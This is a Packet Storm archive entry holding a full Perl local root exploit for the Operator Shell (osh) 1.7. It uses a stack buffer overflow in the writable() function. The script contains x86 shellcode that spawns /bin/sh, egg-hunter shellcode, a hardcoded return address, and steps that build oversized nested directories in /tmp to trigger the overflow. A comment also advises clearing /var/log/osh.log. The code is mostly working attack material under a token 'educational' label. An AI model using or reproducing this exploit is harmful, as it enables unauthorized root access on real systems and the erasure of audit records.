x_osh2.pl.txt

2005-08-17T00:00:00
ID PACKETSTORM:39419
Type packetstorm
Reporter Charles Stevenson
Modified 2005-08-17T00:00:00

Description

                                        
                                            `#!/usr/bin/perl   
#######################################################################  
#  
# OSH 1.7 Exploit #2 (Gonna bang away at this until it's removed ;-)  
#  
# EDUCATIONAL purposes only.... :-)  
#  
# by Charles Stevenson (core) <core@bokeoa.com>  
#  
# Description:  
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted  
# shell. It allows the administrator to carefully limit the access of special  
# commands and files to the users whose duties require their use, while  
# at the same time automatically maintaining audit records. The configuration  
# file for Osh contains an administrator defined access profile for each  
# authorized user or group.  
#  
# Problem (discovered by Solar Eclipse):  
#  
# handlers.c:364  
#  
# char temp3[255];  
#  
# if (*file!='/') {  
# getcwd(temp3, MAXPATHLEN);  
# strcat(temp3,"/");  
# strcat(temp3,file);  
# }  
#  
# ...  
#  
# "If the length of the current working directory plus the length of the  
# file name is longer than 255 bytes, there will be a buffer overflow in  
# temp3[]. The size limit of the current direcory is MAXPATHLEN, which is  
# defined as 1024 on modern Linux systems. The limit for the file name is  
# MAXFNAME, defined as 32 in struct.h:116."  
#  
# "This code is in the writable() function, which is called by the handlers  
# for built-in cp, vi, rm and test commands, as well as the redirect  
# function." -- Solar Eclipse  
#  
# Risk: Medium since user would have to be in the operator group which  
# the admin would have to grant explicitly and I assume would be  
# a trustworthy individual ;-)  
#  
# Solution:  
# apt-get --purge remove osh  
#  
# greetz to solar eclipse, nemo, andrewg, cnn, arcanum, mercy, amnesia,   
# banned-it, capsyl, sloth, redsand, KF, akt0r, MRX, salvia, truthix, ...  
#  
# irc.pulltheplug.org (#social)  
# 0dd: much <3 & respect  
#   
# 08/12/05 - PoC causes segv with 0x41414141 eip  
# 08/16/05 - PoC _exit(0) ... need shellcode to get past char filters  
# 08/16/04 - Later that night... or morning... ROOTSHELL!! Woot! PTP joint  
# effort on the shellcode.  
#  
# I still find it hard to imagine that anyone would use osh  
# The code is basically beyond repair. Sudo is better.... :-)  
#  
# Don't forget to clean /var/log/osh.log  
#  
#######################################################################  
# PRIVATE - DO NOT DISTRIBUTE - PRIVATE #  
#######################################################################  
  
  
# Yanked from one of KF's exploits.. werd brotha ;-) I'm lazy..  
$sc = "\x90" x (511-45) .  
  
# 45 bytes by anthema. 0xff less   
"\x89\xe6" . # /* movl %esp, %esi */   
"\x83\xc6\x30" . # /* addl $0x30, %esi */   
"\xb8\x2e\x62\x69\x6e" . # /bin /* movl $0x6e69622e, %eax */   
"\x40" . # /* incl %eax */   
"\x89\x06" . # /* movl %eax, (%esi) */   
"\xb8\x2e\x73\x68\x21" . # /sh /* movl $0x2168732e, %eax */   
"\x40" . # /* incl %eax */   
"\x89\x46\x04" . # /* movl %eax, 0x04(%esi) */   
"\x29\xc0" . # /* subl %eax, %eax */   
"\x88\x46\x07" . # /* movb %al, 0x07(%esi) */   
"\x89\x76\x08" . # /* movl %esi, 0x08(%esi) */   
"\x89\x46\x0c" . # /* movl %eax, 0x0c(%esi) */   
"\xb0\x0b" . # /* movb $0x0b, %al */   
"\x87\xf3" . # /* xchgl %esi, %ebx */   
"\x8d\x4b\x08" . # /* leal 0x08(%ebx), %ecx */   
"\x8d\x53\x0c" . # /* leal 0x0c(%ebx), %edx */   
"\xcd\x80"; # /* int $0x80 */   
  
# 0day shellcodez....  
#  
# Nemo's idea... PTP #social collaborative effort. Searches the stack  
# until it finds a nopsled and executes the shellcode  
$ptp_sc =   
  
"\x61\x54\x59\x81\x39\x90\x90" .  
"\x90\x90\x74\x02\xeb\xf3\x54" .  
"\xc3";  
  
# _exit(0);  
#"\x31\xc0\x31\xdb\x40\xcd\x80";  
  
print "\nOperator Shell (osh) 1.7-13 root exploit\n";  
print "----------------------------------------------\n";  
print "Written by Charles Stevenson <core\@bokeoa.com>\n";  
print "This exploit would not have been near as fun without\n";  
print "the pulltheplug.org community.\n\n";  
  
# Clear out the environment.   
foreach $key (keys %ENV) { delete $ENV{$key}; }   
  
# Setup simple env  
$ENV{"HELLCODE"} = "$sc";   
$ENV{"TERM"} = "linux";   
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin";   
  
chdir("/tmp/");  
  
# Create the payload...  
mkdir("A"x255,0755);  
chdir("A"x255);  
mkdir("B"x255,0755);  
chdir("B"x255);  
mkdir("C"x118,0755);  
chdir("C"x118);  
  
#XXX: Return address can't have: 0x09 0x0a 0x20 0x22 0x24 0x26  
# (what made this fun) 0x3b 0x3c 0x3e 0x7c 0xff  
  
#$file = pack("l",0xdeadbeef) . "core";  
#$file = pack("l",0x804e36c) . "core";  
$file = pack("l",0x804e36c) . $ptp_sc; # inputfp + 12  
  
system("touch '$file'");  
system("/usr/sbin/osh test -w '$file'");  
  
print("cleaning up /tmp\n");  
chdir("../../../");  
system("rm -rf AAAA*/");  
  
# EOF  
  
`